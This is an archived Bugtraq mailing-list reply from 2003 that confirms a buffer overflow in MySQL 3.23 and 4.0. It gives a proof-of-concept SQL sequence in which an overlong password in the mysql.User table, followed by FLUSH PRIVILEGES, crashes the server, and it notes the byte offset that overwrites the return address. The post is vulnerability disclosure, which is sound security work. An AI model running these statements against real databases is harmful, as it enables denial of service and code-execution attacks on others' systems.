Bugtraq mailing list archives
Re: Buffer overflow in MySQL
From: Konstantin Tsolov <ktsolov () etel bg>
Date: Thu, 11 Sep 2003 13:41:29 +0300
managed to replicate on 4.0.13 (custom made) running on slack8.1 with mysql.mysql. 3.23.51 (the distro mysql version) also proved vulnerable. nb: just make sure you have a backup copy of your mysql db when testing this harmless proof of concept on your production server :-)
successful exploitation of that bug is trivial on some platforms. On most Linux systems the return address needs about 444 bytes to get overwritten. Harmless proof of concept : > USE mysql; > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT; > UPDATE User SET Password = '123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 12345678123456781234567812345678...' WHERE User = 'abcd'; > FLUSH PRIVILEGES; [Connection lost]
-- "Talk is cheap because supply always exceeds demand." -- source unknown +------------------------------------------------------+ | Konstantin Tsolov ktsolov at etel dot bg | | Systems Administrator - VoIP | | eTel Ltd. www.etel.bg | | Sofia, Bulgaria | +------------------------------------------------------+
Current thread:
- Buffer overflow in MySQL Jedi/Sector One (Sep 10)
- Re: Buffer overflow in MySQL Konstantin Tsolov (Sep 12)